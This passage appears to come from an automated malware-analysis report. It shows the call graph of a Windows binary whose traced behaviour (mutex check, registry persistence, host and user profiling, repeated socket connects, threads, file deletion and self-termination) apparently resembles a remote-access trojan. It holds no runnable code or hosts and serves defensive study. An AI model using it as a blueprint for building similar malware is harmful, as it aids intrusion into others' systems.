46410 401eea 26 API calls 46407->46410 46408 40d9a4 46727 40bed7 46408->46727 46409->46408 46414 4124b7 3 API calls 46409->46414 46411 40d927 46410->46411 46961 4124b7 RegOpenKeyExA 46411->46961 46413 40d9aa 46413->46386 46730 41a473 46413->46730 46419 40d988 46414->46419 46417 40d9c5 46420 40da18 46417->46420 46747 40697b 46417->46747 47037 412902 30 API calls 46418->47037 46419->46408 46964 412902 30 API calls 46419->46964 46422 401d64 28 API calls 46420->46422 46425 40da21 46422->46425 46434 40da32 46425->46434 46435 40da2d 46425->46435 46427 40e14a 47038 4112b5 64 API calls ___scrt_fastfail 46427->47038 46428 40d9e4 46965 40699d 30 API calls 46428->46965 46429 40d9ee 46432 401d64 28 API calls 46429->46432 46442 40d9f7 46432->46442 46439 401d64 28 API calls 46434->46439 46968 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46435->46968 46436 40d9e9 46966 4064d0 97 API calls 46436->46966 46440 40da3b 46439->46440 46751 41ae18 46440->46751 46442->46420 46445 40da13 46442->46445 46443 40da46 46755 401e18 46443->46755 46967 4064d0 97 API calls 46445->46967 46446 40da51 46759 401e13 46446->46759 46449 40da5a 46450 401d64 28 API calls 46449->46450 46451 40da63 46450->46451 46452 401d64 28 API calls 46451->46452 46453 40da7d 46452->46453 46454 401d64 28 API calls 46453->46454 46455 40da97 46454->46455 46456 401d64 28 API calls 46455->46456 46458 40dab0 46456->46458 46457 40db1d 46459 40db2c 46457->46459 46466 40dcaa ___scrt_fastfail 46457->46466 46458->46457 46460 401d64 28 API calls 46458->46460 46461 40db35 46459->46461 46489 40dbb1 ___scrt_fastfail 46459->46489 46464 40dac5 _wcslen 46460->46464 46462 401d64 28 API calls 46461->46462 46463 40db3e 46462->46463 46465 401d64 28 API calls 46463->46465 46464->46457 46467 401d64 28 API calls 46464->46467 46468 40db50 46465->46468 47028 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46466->47028 46469 40dae0 46467->46469 46471 401d64 28 API calls 46468->46471 46472 401d64 28 API calls 46469->46472 46473 40db62 46471->46473 46474 40daf5 46472->46474 46477 401d64 28 API calls 46473->46477 46969 40c89e 46474->46969 46475 40dcef 46476 401d64 28 API calls 46475->46476 46479 40dd16 46476->46479 46478 40db8b 46477->46478 46483 401d64 28 API calls 46478->46483 46773 401f66 46479->46773 46482 401e18 26 API calls 46485 40db14 46482->46485 46486 40db9c 46483->46486 46488 401e13 26 API calls 46485->46488 47026 40bc67 45 API calls _wcslen 46486->47026 46487 40dd25 46777 4126d2 RegCreateKeyA 46487->46777 46488->46457 46763 4128a2 46489->46763 46493 40dc45 ctype 46498 401d64 28 API calls 46493->46498 46494 40dbac 46494->46489 46496 401d64 28 API calls 46497 40dd47 46496->46497 46783 43a5f7 46497->46783 46499 40dc5c 46498->46499 46499->46475 46503 40dc70 46499->46503 46502 40dd5e 47029 41bec0 86 API calls ___scrt_fastfail 46502->47029 46505 401d64 28 API calls 46503->46505 46504 40dd81 46509 401f66 28 API calls 46504->46509 46507 40dc7e 46505->46507 46510 41ae18 28 API calls 46507->46510 46508 40dd65 CreateThread 46508->46504 47427 41c97f 10 API calls 46508->47427 46511 40dd96 46509->46511 46512 40dc87 46510->46512 46513 401f66 28 API calls 46511->46513 47027 40e219 109 API calls 46512->47027 46515 40dda5 46513->46515 46787 41a696 46515->46787 46516 40dc8c 46516->46475 46517 40dc93 46516->46517 46517->46386 46520 401d64 28 API calls 46521 40ddb6 46520->46521 46522 401d64 28 API calls 46521->46522 46523 40ddcb 46522->46523 46524 401d64 28 API calls 46523->46524 46525 40ddeb 46524->46525 46526 43a5f7 _strftime 42 API calls 46525->46526 46527 40ddf8 46526->46527 46528 401d64 28 API calls 46527->46528 46529 40de03 46528->46529 46530 401d64 28 API calls 46529->46530 46531 40de14 46530->46531 46532 401d64 28 API calls 46531->46532 46533 40de29 46532->46533 46534 401d64 28 API calls 46533->46534 46535 40de3a 46534->46535 46536 40de41 StrToIntA 46535->46536 46811 409517 46536->46811 46539 401d64 28 API calls 46540 40de5c 46539->46540 46541 40dea1 46540->46541 46542 40de68 46540->46542 46545 401d64 28 API calls 46541->46545 47030 43361d 22 API calls 3 library calls 46542->47030 46544 40de71 46546 401d64 28 API calls 46544->46546 46547 40deb1 46545->46547 46548 40de84 46546->46548 46549 40def9 46547->46549 46550 40debd 46547->46550 46551 40de8b CreateThread 46548->46551 46553 401d64 28 API calls 46549->46553 47031 43361d 22 API calls 3 library calls 46550->47031 46551->46541 47425 419138 102 API calls 2 library calls 46551->47425 46555 40df02 46553->46555 46554 40dec6 46556 401d64 28 API calls 46554->46556 46558 40df6c 46555->46558 46559 40df0e 46555->46559 46557 40ded8 46556->46557 46560 40dedf CreateThread 46557->46560 46561 401d64 28 API calls 46558->46561 46562 401d64 28 API calls 46559->46562 46560->46549 47424 419138 102 API calls 2 library calls 46560->47424 46564 40df75 46561->46564 46563 40df1e 46562->46563 46567 401d64 28 API calls 46563->46567 46565 40df81 46564->46565 46566 40dfba 46564->46566 46568 401d64 28 API calls 46565->46568 46836 41a7b2 GetComputerNameExW GetUserNameW 46566->46836 46569 40df33 46567->46569 46572 40df8a 46568->46572 47032 40c854 31 API calls 46569->47032 46577 401d64 28 API calls 46572->46577 46573 401e18 26 API calls 46574 40dfce 46573->46574 46576 401e13 26 API calls 46574->46576 46579 40dfd7 46576->46579 46580 40df9f 46577->46580 46578 40df46 46581 401e18 26 API calls 46578->46581 46582 40dfe0 SetProcessDEPPolicy 46579->46582 46583 40dfe3 CreateThread 46579->46583 46590 43a5f7 _strftime 42 API calls 46580->46590 46584 40df52 46581->46584 46582->46583 46585 40e004 46583->46585 46586 40dff8 CreateThread 46583->46586 47397 40e54f 46583->47397 46587 401e13 26 API calls 46584->46587 46588 40e019 46585->46588 46589 40e00d CreateThread 46585->46589 46586->46585 47426 410f36 136 API calls 46586->47426 46591 40df5b CreateThread 46587->46591 46593 40e073 46588->46593 46595 401f66 28 API calls 46588->46595 46589->46588 47428 411524 38 API calls ___scrt_fastfail 46589->47428 46592 40dfac 46590->46592 46591->46558 47429 40196b 49 API calls _strftime 46591->47429 47033 40b95c 7 API calls 46592->47033 46847 41246e RegOpenKeyExA 46593->46847 46596 40e046 46595->46596 47034 404c9e 28 API calls 46596->47034 46599 40e053 46601 401f66 28 API calls 46599->46601 46603 40e062 46601->46603 46602 40e12a 46859 40cbac 46602->46859 46606 41a696 79 API calls 46603->46606 46605 41ae18 28 API calls 46608 40e0a4 46605->46608 46609 40e067 46606->46609 46850 412584 RegOpenKeyExW 46608->46850 46611 401eea 26 API calls 46609->46611 46611->46593 46614 401e13 26 API calls 46617 40e0c5 46614->46617 46615 40e0ed DeleteFileW 46616 40e0f4 46615->46616 46615->46617 46619 41ae18 28 API calls 46616->46619 46617->46615 46617->46616 46618 40e0db Sleep 46617->46618 47035 401e07 46618->47035 46621 40e104 46619->46621 46855 41297a RegOpenKeyExW 46621->46855 46623 40e117 46624 401e13 26 API calls 46623->46624 46625 40e121 46624->46625 46626 401e13 26 API calls 46625->46626 46626->46602 46627->46313 46628->46319 46629->46317 46630->46327 46631->46329 46632->46332 46633->46307 46634->46310 46635->46314 46636->46336 46637->46338 46638->46341 46639->46343 46641 433c81 GetStartupInfoW 46640->46641 46641->46347 46643 44ddeb 46642->46643 46644 44dde2 46642->46644 46643->46351 46647 44dcd8 51 API calls 4 library calls 46644->46647 46646->46351 46647->46643 46649 41bd32 LoadLibraryA GetProcAddress 46648->46649 46650 41bd22 GetModuleHandleA GetProcAddress 46648->46650 46651 41bd5b 32 API calls 46649->46651 46652 41bd4b LoadLibraryA GetProcAddress 46649->46652 46650->46649 46651->46355 46652->46651 47039 41a64f FindResourceA 46653->47039 46656 43a89c _Yarn 21 API calls 46657 40e192 ctype 46656->46657 47042 401f86 46657->47042 46660 401eef 26 API calls 46661 40e1b8 46660->46661 46662 401eea 26 API calls 46661->46662 46663 40e1c1 46662->46663 46664 43a89c _Yarn 21 API calls 46663->46664 46665 40e1d2 ctype 46664->46665 47046 406052 46665->47046 46667 40e205 46667->46357 46669 401fcc 46668->46669 47054 402501 46669->47054 46671 401fea 46671->46360 46692 41afe6 46672->46692 46673 41b056 46674 401eea 26 API calls 46673->46674 46675 41b088 46674->46675 46676 401eea 26 API calls 46675->46676 46678 41b090 46676->46678 46677 41b058 47061 403b60 28 API calls 46677->47061 46681 401eea 26 API calls 46678->46681 46683 40d7c6 46681->46683 46682 41b064 46684 401eef 26 API calls 46682->46684 46693 40e8bd 46683->46693 46686 41b06d 46684->46686 46685 401eef 26 API calls 46685->46692 46687 401eea 26 API calls 46686->46687 46689 41b075 46687->46689 46688 401eea 26 API calls 46688->46692 47062 41bfb9 28 API calls 46689->47062 46692->46673 46692->46677 46692->46685 46692->46688 47059 403b60 28 API calls 46692->47059 47060 41bfb9 28 API calls 46692->47060 46694 40e8ca 46693->46694 46696 40e8da 46694->46696 47063 40200a 26 API calls 46694->47063 46696->46365 46698 40200a 46697->46698 46702 40203a 46698->46702 47064 402654 26 API calls 46698->47064 46700 40202b 47065 4026ba 26 API calls _Deallocate 46700->47065 46702->46367 46704 401d6c 46703->46704 46705 401d74 46704->46705 47066 401fff 28 API calls 46704->47066 46705->46372 46709 404ccb 46708->46709 47067 402e78 46709->47067 46711 404cee 46711->46379 47076 404bc4 46712->47076 46714 405cf4 46714->46383 46716 401efe 46715->46716 46718 401f0a 46716->46718 47085 4021b9 26 API calls 46716->47085 46718->46387 46720 4021b9 46719->46720 46721 4021e8 46720->46721 47086 40262e 26 API calls _Deallocate 46720->47086 46721->46389 46725 401ec9 46723->46725 46724 401ee4 46724->46397 46725->46724 46726 402325 28 API calls 46725->46726 46726->46724 47087 401e8f 46727->47087 46729 40bee1 CreateMutexA GetLastError 46729->46413 47089 41b16b 46730->47089 46735 401eef 26 API calls 46736 41a4af 46735->46736 46737 401eea 26 API calls 46736->46737 46738 41a4b7 46737->46738 46739 41a50a 46738->46739 46740 412513 31 API calls 46738->46740 46739->46417 46741 41a4dd 46740->46741 46742 41a4e8 StrToIntA 46741->46742 46743 41a4ff 46742->46743 46744 41a4f6 46742->46744 46746 401eea 26 API calls 46743->46746 47097 41c112 28 API calls 46744->47097 46746->46739 46748 40698f 46747->46748 46749 4124b7 3 API calls 46748->46749 46750 406996 46749->46750 46750->46428 46750->46429 46752 41ae2c 46751->46752 47098 40b027 46752->47098 46754 41ae34 46754->46443 46756 401e27 46755->46756 46758 401e33 46756->46758 47107 402121 26 API calls 46756->47107 46758->46446 46761 402121 46759->46761 46760 402150 46760->46449 46761->46760 47108 402718 26 API calls _Deallocate 46761->47108 46764 4128c0 46763->46764 46765 406052 28 API calls 46764->46765 46766 4128d5 46765->46766 46767 401fbd 28 API calls 46766->46767 46768 4128e5 46767->46768 46769 4126d2 29 API calls 46768->46769 46770 4128ef 46769->46770 46771 401eea 26 API calls 46770->46771 46772 4128fc 46771->46772 46772->46493 46774 401f6e 46773->46774 47109 402301 46774->47109 46778 412722 46777->46778 46780 4126eb 46777->46780 46779 401eea 26 API calls 46778->46779 46781 40dd3b 46779->46781 46782 4126fd RegSetValueExA RegCloseKey 46780->46782 46781->46496 46782->46778 46784 43a610 _strftime 46783->46784 47113 43994e 46784->47113 46788 41a747 46787->46788 46789 41a6ac GetLocalTime 46787->46789 46790 401eea 26 API calls 46788->46790 46791 404cbf 28 API calls 46789->46791 46792 41a74f 46790->46792 46793 41a6ee 46791->46793 46794 401eea 26 API calls 46792->46794 46795 405ce6 28 API calls 46793->46795 46797 40ddaa 46794->46797 46796 41a6fa 46795->46796 47147 4027cb 46796->47147 46797->46520 46799 41a706 46800 405ce6 28 API calls 46799->46800 46801 41a712 46800->46801 47150 406478 76 API calls 46801->47150 46803 41a720 46804 401eea 26 API calls 46803->46804 46805 41a72c 46804->46805 46806 401eea 26 API calls 46805->46806 46807 41a735 46806->46807 46808 401eea 26 API calls 46807->46808 46809 41a73e 46808->46809 46810 401eea 26 API calls 46809->46810 46810->46788 46812 409536 _wcslen 46811->46812 46813 409541 46812->46813 46814 409558 46812->46814 46815 40c89e 31 API calls 46813->46815 46816 40c89e 31 API calls 46814->46816 46817 409549 46815->46817 46818 409560 46816->46818 46819 401e18 26 API calls 46817->46819 46820 401e18 26 API calls 46818->46820 46835 409553 46819->46835 46821 40956e 46820->46821 46822 401e13 26 API calls 46821->46822 46824 409576 46822->46824 46823 401e13 26 API calls 46825 4095ad 46823->46825 47170 40856b 28 API calls 46824->47170 47155 409837 46825->47155 46828 409588 47171 4028cf 46828->47171 46831 409593 46832 401e18 26 API calls 46831->46832 46833 40959d 46832->46833 46834 401e13 26 API calls 46833->46834 46834->46835 46835->46823 47190 403b40 46836->47190 46840 41a80d 46841 4028cf 28 API calls 46840->46841 46842 41a817 46841->46842 46843 401e13 26 API calls 46842->46843 46844 41a820 46843->46844 46845 401e13 26 API calls 46844->46845 46846 40dfc3 46845->46846 46846->46573 46848 40e08b 46847->46848 46849 41248f RegQueryValueExA RegCloseKey 46847->46849 46848->46602 46848->46605 46849->46848 46851 4125b0 RegQueryValueExW RegCloseKey 46850->46851 46852 4125dd 46850->46852 46851->46852 46853 403b40 28 API calls 46852->46853 46854 40e0ba 46853->46854 46854->46614 46856 412992 RegDeleteValueW 46855->46856 46857 4129a6 46855->46857 46856->46857 46858 4129a2 46856->46858 46857->46623 46858->46623 46860 40cbc5 46859->46860 46861 41246e 3 API calls 46860->46861 46862 40cbcc 46861->46862 46866 40cbeb 46862->46866 47223 401602 46862->47223 46864 40cbd9 47226 4127d5 RegCreateKeyA 46864->47226 46867 413fd4 46866->46867 46868 413feb 46867->46868 47243 41aa83 46868->47243 46870 413ff6 46871 401d64 28 API calls 46870->46871 46872 41400f 46871->46872 46873 43a5f7 _strftime 42 API calls 46872->46873 46874 41401c 46873->46874 46875 414021 Sleep 46874->46875 46876 41402e 46874->46876 46875->46876 46877 401f66 28 API calls 46876->46877 46878 41403d 46877->46878 46879 401d64 28 API calls 46878->46879 46880 41404b 46879->46880 46881 401fbd 28 API calls 46880->46881 46882 414053 46881->46882 46883 41afd3 28 API calls 46882->46883 46884 41405b 46883->46884 47247 404262 WSAStartup 46884->47247 46886 414065 46887 401d64 28 API calls 46886->46887 46888 41406e 46887->46888 46889 401d64 28 API calls 46888->46889 46914 4140ed 46888->46914 46890 414087 46889->46890 46891 401d64 28 API calls 46890->46891 46892 414098 46891->46892 46894 401d64 28 API calls 46892->46894 46893 41afd3 28 API calls 46893->46914 46895 4140a9 46894->46895 46896 401d64 28 API calls 46895->46896 46898 4140ba 46896->46898 46897 4085b4 28 API calls 46897->46914 46900 401d64 28 API calls 46898->46900 46899 401eef 26 API calls 46899->46914 46901 4140cb 46900->46901 46902 401d64 28 API calls 46901->46902 46903 4140dd 46902->46903 47349 404101 87 API calls 46903->47349 46905 404cbf 28 API calls 46905->46914 46906 405ce6 28 API calls 46906->46914 46907 4027cb 28 API calls 46907->46914 46909 414244 WSAGetLastError 47350 41bc86 30 API calls 46909->47350 46914->46893 46914->46897 46914->46899 46914->46905 46914->46906 46914->46907 46914->46909 46916 401eea 26 API calls 46914->46916 46918 401d8c 26 API calls 46914->46918 46919 401d64 28 API calls 46914->46919 46920 43a5f7 _strftime 42 API calls 46914->46920 46922 401f66 28 API calls 46914->46922 46923 41a696 79 API calls 46914->46923 46927 401fbd 28 API calls 46914->46927 46929 412513 31 API calls 46914->46929 46952 41446f 46914->46952 47248 413f9a 46914->47248 47253 4041f1 46914->47253 47260 404915 46914->47260 47275 40428c connect 46914->47275 47335 4047eb WaitForSingleObject 46914->47335 47351 404c9e 28 API calls 46914->47351 47352 413683 50 API calls 46914->47352 47353 4082dc 28 API calls 46914->47353 47354 440c61 26 API calls 46914->47354 47355 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46914->47355 46916->46914 46918->46914 46919->46914 46921 414b80 Sleep 46920->46921 46921->46914 46922->46914 46923->46914 46927->46914 46929->46914 46930 403b40 28 API calls 46930->46952 46933 41aed8 28 API calls 46933->46952 46934 41ad56 28 API calls 46934->46952 46935 401d64 28 API calls 46936 4144ed GetTickCount 46935->46936 47358 41ad56 28 API calls 46936->47358 46942 405ce6 28 API calls 46942->46952 46943 40275c 28 API calls 46943->46952 46944 4027cb 28 API calls 46944->46952 46946 401eea 26 API calls 46946->46952 46949 401f66 28 API calls 46949->46952 46950 41a696 79 API calls 46950->46952 46951 414b22 CreateThread 46951->46952 47390 419e99 101 API calls 46951->47390 46952->46914 46952->46930 46952->46933 46952->46934 46952->46935 46952->46942 46952->46943 46952->46944 46952->46946 46952->46949 46952->46950 46952->46951 46953 401e13 26 API calls 46952->46953 47356 40cbf1 6 API calls 46952->47356 47357 41adfe 28 API calls 46952->47357 47359 41acb0 GetTickCount 46952->47359 47360 41ac62 30 API calls ___scrt_fastfail 46952->47360 47361 40e679 29 API calls 46952->47361 47362 4027ec 28 API calls 46952->47362 47363 404468 59 API calls ctype 46952->47363 47364 4045d5 111 API calls _Yarn 46952->47364 47365 40a767 84 API calls 46952->47365 46953->46952 46954->46373 46955->46382 46958 4085c0 46957->46958 46959 402e78 28 API calls 46958->46959 46960 4085e4 46959->46960 46960->46405 46962 4124e1 RegQueryValueExA RegCloseKey 46961->46962 46963 41250b 46961->46963 46962->46963 46963->46401 46964->46408 46965->46436 46966->46429 46967->46420 46968->46434 46970 40c8ba 46969->46970 46971 40c8d0 46970->46971 46972 40c8da 46970->46972 46973 40c90f 46970->46973 46974 40ca03 GetLongPathNameW 46971->46974 47391 41a75b 29 API calls 46972->47391 46975 41b16b GetCurrentProcess 46973->46975 46977 403b40 28 API calls 46974->46977 46978 40c914 46975->46978 46981 40ca18 46977->46981 46982 40c918 46978->46982 46983 40c96a 46978->46983 46979 40c8e3 46980 401e18 26 API calls 46979->46980 46984 40c8ed 46980->46984 46985 403b40 28 API calls 46981->46985 46987 403b40 28 API calls 46982->46987 46986 403b40 28 API calls 46983->46986 46991 401e13 26 API calls 46984->46991 46988 40ca27 46985->46988 46989 40c978 46986->46989 46990 40c926 46987->46990 47394 40cc37 28 API calls 46988->47394 46995 403b40 28 API calls 46989->46995 46996 403b40 28 API calls 46990->46996 46991->46971 46993 40ca3a 47395 402860 28 API calls 46993->47395 46999 40c98e 46995->46999 46997 40c93c 46996->46997 47392 402860 28 API calls 46997->47392 46998 40ca45 47396 402860 28 API calls 46998->47396 47393 402860 28 API calls 46999->47393 47003 40c999 47007 401e18 26 API calls 47003->47007 47004 40c947 47008 401e18 26 API calls 47004->47008 47005 40ca4f 47006 401e13 26 API calls 47005->47006 47009 40ca59 47006->47009 47010 40c9a4 47007->47010 47011 40c952 47008->47011 47012 401e13 26 API calls 47009->47012 47013 401e13 26 API calls 47010->47013 47014 401e13 26 API calls 47011->47014 47015 40ca62 47012->47015 47016 40c9ad 47013->47016 47017 40c95b 47014->47017 47018 401e13 26 API calls 47015->47018 47019 401e13 26 API calls 47016->47019 47020 401e13 26 API calls 47017->47020 47021 40ca6b 47018->47021 47019->46984 47020->46984 47022 401e13 26 API calls 47021->47022 47023 40ca74 47022->47023 47024 401e13 26 API calls 47023->47024 47025 40ca7d 47024->47025 47025->46482 47026->46494 47027->46516 47028->46475 47029->46508 47030->46544 47031->46554 47032->46578 47033->46566 47034->46599 47036 401e0c 47035->47036 47037->46427 47040 40e183 47039->47040 47041 41a66c LoadResource LockResource SizeofResource 47039->47041 47040->46656 47041->47040 47043 401f8e 47042->47043 47049 402325 47043->47049 47045 401fa4 47045->46660 47047 401f86 28 API calls 47046->47047 47048 406066 47047->47048 47048->46667 47050 40232f 47049->47050 47052 40233a 47050->47052 47053 40294a 28 API calls 47050->47053 47052->47045 47053->47052 47055 40250d 47054->47055 47057 40252b 47055->47057 47058 40261a 28 API calls 47055->47058 47057->46671 47058->47057 47059->46692 47060->46692 47061->46682 47062->46673 47063->46696 47064->46700 47065->46702 47069 402e85 47067->47069 47068 402ea9 47068->46711 47069->47068 47070 402e98 47069->47070 47072 402eae 47069->47072 47074 403445 28 API calls 47070->47074 47072->47068 47075 40225b 26 API calls 47072->47075 47074->47068 47075->47068 47077 404bd0 47076->47077 47080 40245c 47077->47080 47079 404be4 47079->46714 47081 402469 47080->47081 47083 402478 47081->47083 47084 402ad3 28 API calls 47081->47084 47083->47079 47084->47083 47085->46718 47086->46721 47088 401e94 47087->47088 47090 41a481 47089->47090 47091 41b178 GetCurrentProcess 47089->47091 47092 412513 RegOpenKeyExA 47090->47092 47091->47090 47093 412541 RegQueryValueExA RegCloseKey 47092->47093 47094 412569 47092->47094 47093->47094 47095 401f66 28 API calls 47094->47095 47096 41257e 47095->47096 47096->46735 47097->46743 47099 40b02f 47098->47099 47102 40b04b 47099->47102 47101 40b045 47101->46754 47103 40b055 47102->47103 47105 40b060 47103->47105 47106 40b138 28 API calls 47103->47106 47105->47101 47106->47105 47107->46758 47108->46760 47110 40230d 47109->47110 47111 402325 28 API calls 47110->47111 47112 401f80 47111->47112 47112->46487 47131 43a555 47113->47131 47115 43999b 47140 4392ee 38 API calls 2 library calls 47115->47140 47116 439960 47116->47115 47117 439975 47116->47117 47130 40dd54 47116->47130 47138 445364 20 API calls __dosmaperr 47117->47138 47120 43997a 47139 43a837 26 API calls _Deallocate 47120->47139 47123 4399a7 47124 4399d6 47123->47124 47141 43a59a 42 API calls __Tolower 47123->47141 47127 439a42 47124->47127 47142 43a501 26 API calls 2 library calls 47124->47142 47143 43a501 26 API calls 2 library calls 47127->47143 47128 439b09 _strftime 47128->47130 47144 445364 20 API calls __dosmaperr 47128->47144 47130->46502 47130->46504 47132 43a55a 47131->47132 47133 43a56d 47131->47133 47145 445364 20 API calls __dosmaperr 47132->47145 47133->47116 47135 43a55f 47146 43a837 26 API calls _Deallocate 47135->47146 47137 43a56a 47137->47116 47138->47120 47139->47130 47140->47123 47141->47123 47142->47127 47143->47128 47144->47130 47145->47135 47146->47137 47151 401e9b 47147->47151 47149 4027d9 47149->46799 47150->46803 47152 401ea7 47151->47152 47153 40245c 28 API calls 47152->47153 47154 401eb9 47153->47154 47154->47149 47156 409855 47155->47156 47157 4124b7 3 API calls 47156->47157 47158 40985c 47157->47158 47159 409870 47158->47159 47160 40988a 47158->47160 47161 4095cf 47159->47161 47162 409875 47159->47162 47176 4082dc 28 API calls 47160->47176 47161->46539 47174 4082dc 28 API calls 47162->47174 47165 409898 47177 4098a5 85 API calls 47165->47177 47166 409883 47175 409959 29 API calls 47166->47175 47169 409888 47169->47161 47170->46828 47181 402d8b 47171->47181 47173 4028dd 47173->46831 47174->47166 47175->47169 47178 40999f 129 API calls 47175->47178 47176->47165 47177->47161 47179 4099b5 52 API calls 47177->47179 47180 4099a9 124 API calls 47177->47180 47182 402d97 47181->47182 47185 4030f7 47182->47185 47184 402dab 47184->47173 47186 403101 47185->47186 47188 403115 47186->47188 47189 4036c2 28 API calls 47186->47189 47188->47184 47189->47188 47191 403b48 47190->47191 47197 403b7a 47191->47197 47194 403cbb 47206 403dc2 47194->47206 47196 403cc9 47196->46840 47198 403b86 47197->47198 47201 403b9e 47198->47201 47200 403b5a 47200->47194 47202 403ba8 47201->47202 47204 403bb3 47202->47204 47205 403cfd 28 API calls 47202->47205 47204->47200 47205->47204 47207 403dce 47206->47207 47210 402ffd 47207->47210 47209 403de3 47209->47196 47211 40300e 47210->47211 47216 4032a4 47211->47216 47215 40302e 47215->47209 47217 4032b0 47216->47217 47218 40301a 47216->47218 47222 4032b6 28 API calls 47217->47222 47218->47215 47221 4035e8 28 API calls 47218->47221 47221->47215 47229 4395ca 47223->47229 47227 412814 47226->47227 47228 4127ed RegSetValueExA RegCloseKey 47226->47228 47227->46866 47228->47227 47232 43954b 47229->47232 47231 401608 47231->46864 47233 43955a 47232->47233 47234 43956e 47232->47234 47240 445364 20 API calls __dosmaperr 47233->47240 47239 43956a __alldvrm 47234->47239 47242 447611 11 API calls 2 library calls 47234->47242 47236 43955f 47241 43a837 26 API calls _Deallocate 47236->47241 47239->47231 47240->47236 47241->47239 47242->47239 47244 41aac9 ctype ___scrt_fastfail 47243->47244 47245 401f66 28 API calls 47244->47245 47246 41ab3e 47245->47246 47246->46870 47247->46886 47249 413fb3 getaddrinfo WSASetLastError 47248->47249 47250 413fa9 47248->47250 47249->46914 47366 413e37 35 API calls ___std_exception_copy 47250->47366 47252 413fae 47252->47249 47254 404206 socket 47253->47254 47255 4041fd 47253->47255 47257 404220 47254->47257 47258 404224 CreateEventW 47254->47258 47367 404262 WSAStartup 47255->47367 47257->46914 47258->46914 47259 404202 47259->47254 47259->47257 47261 4049b1 47260->47261 47262 40492a 47260->47262 47261->46914 47263 404933 47262->47263 47264 404987 CreateEventA CreateThread 47262->47264 47265 404942 GetLocalTime 47262->47265 47263->47264 47264->47261 47370 404b1d 47264->47370 47368 41ad56 28 API calls 47265->47368 47267 40495b 47369 404c9e 28 API calls 47267->47369 47269 404968 47270 401f66 28 API calls 47269->47270 47271 404977 47270->47271 47272 41a696 79 API calls 47271->47272 47273 40497c 47272->47273 47274 401eea 26 API calls 47273->47274 47274->47264 47276 4043e1 47275->47276 47277 4042b3 47275->47277 47278 4043e7 WSAGetLastError 47276->47278 47279 404343 47276->47279 47277->47279 47281 4042e8 47277->47281 47282 404cbf 28 API calls 47277->47282 47278->47279 47280 4043f7 47278->47280 47279->46914 47283 4042f7 47280->47283 47284 4043fc 47280->47284 47374 420161 27 API calls 47281->47374 47286 4042d4 47282->47286 47292 401f66 28 API calls 47283->47292 47385 41bc86 30 API calls 47284->47385 47289 401f66 28 API calls 47286->47289 47288 4042f0 47288->47283 47291 404306 47288->47291 47294 4042e3 47289->47294 47290 40440b 47386 404c9e 28 API calls 47290->47386 47301 404315 47291->47301 47302 40434c 47291->47302 47293 404448 47292->47293 47296 401f66 28 API calls 47293->47296 47297 41a696 79 API calls 47294->47297 47299 404457 47296->47299 47297->47281 47298 404418 47300 401f66 28 API calls 47298->47300 47303 41a696 79 API calls 47299->47303 47304 404427 47300->47304 47306 401f66 28 API calls 47301->47306 47382 420f44 55 API calls 47302->47382 47303->47279 47307 41a696 79 API calls 47304->47307 47309 404324 47306->47309 47311 40442c 47307->47311 47308 404354 47312 404389 47308->47312 47313 404359 47308->47313 47310 401f66 28 API calls 47309->47310 47314 404333 47310->47314 47316 401eea 26 API calls 47311->47316 47384 4202fa 28 API calls 47312->47384 47317 401f66 28 API calls 47313->47317 47318 41a696 79 API calls 47314->47318 47316->47279 47320 404368 47317->47320 47332 404338 47318->47332 47319 404391 47321 4043be CreateEventW CreateEventW 47319->47321 47323 401f66 28 API calls 47319->47323 47322 401f66 28 API calls 47320->47322 47321->47279 47324 404377 47322->47324 47326 4043a7 47323->47326 47327 41a696 79 API calls 47324->47327 47329 401f66 28 API calls 47326->47329 47328 40437c 47327->47328 47383 4205a2 53 API calls 47328->47383 47331 4043b6 47329->47331 47333 41a696 79 API calls 47331->47333 47375 4201a1 47332->47375 47334 4043bb 47333->47334 47334->47321 47336 404805 SetEvent CloseHandle 47335->47336 47337 40481c closesocket 47335->47337 47338 40489c 47336->47338 47339 404829 47337->47339 47338->46914 47340 404838 47339->47340 47341 40483f 47339->47341 47389 404ab1 83 API calls 47340->47389 47343 404851 WaitForSingleObject 47341->47343 47344 404892 SetEvent CloseHandle 47341->47344 47345 4201a1 3 API calls 47343->47345 47344->47338 47346 404860 SetEvent WaitForSingleObject 47345->47346 47347 4201a1 3 API calls 47346->47347 47348 404878 SetEvent CloseHandle CloseHandle 47347->47348 47348->47344 47349->46914 47350->46914 47351->46914 47352->46914 47353->46914 47354->46914 47355->46914 47356->46952 47357->46952 47358->46952 47359->46952 47360->46952 47361->46952 47362->46952 47363->46952 47364->46952 47365->46952 47366->47252 47367->47259 47368->47267 47369->47269 47373 404b29 101 API calls 47370->47373 47372 404b26 47373->47372 47374->47288 47376 41dc25 47375->47376 47377 4201a9 47375->47377 47378 41dc33 47376->47378 47387 41cd79 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47376->47387 47377->47279 47388 41d960 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47378->47388 47381 41dc3a 47382->47308 47383->47332 47384->47319 47385->47290 47386->47298 47387->47378 47388->47381 47389->47341 47391->46979 47392->47004 47393->47003 47394->46993 47395->46998 47396->47005 47398 40e56a 47397->47398 47399 4124b7 3 API calls 47398->47399 47400 40e60e 47398->47400 47402 40e5fe Sleep 47398->47402 47419 40e59c 47398->47419 47399->47398 47433 4082dc 28 API calls 47400->47433 47402->47398 47405 41ae18 28 API calls 47405->47419 47406 40e619 47407 41ae18 28 API calls 47406->47407 47408 40e625 47407->47408 47434 412774 29 API calls 47408->47434 47411 401e13 26 API calls 47411->47419 47412 40e638 47413 401e13 26 API calls 47412->47413 47415 40e644 47413->47415 47414 401f66 28 API calls 47414->47419 47416 401f66 28 API calls 47415->47416 47417 40e655 47416->47417 47420 4126d2 29 API calls 47417->47420 47418 4126d2 29 API calls 47418->47419 47419->47402 47419->47405 47419->47411 47419->47414 47419->47418 47430 40bf04 73 API calls ___scrt_fastfail 47419->47430 47431 4082dc 28 API calls 47419->47431 47432 412774 29 API calls 47419->47432 47421 40e668 47420->47421 47435 411699 TerminateProcess WaitForSingleObject 47421->47435 47423 40e670 ExitProcess 47436 411637 60 API calls 47426->47436 47431->47419 47432->47419 47433->47406 47434->47412 47435->47423

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
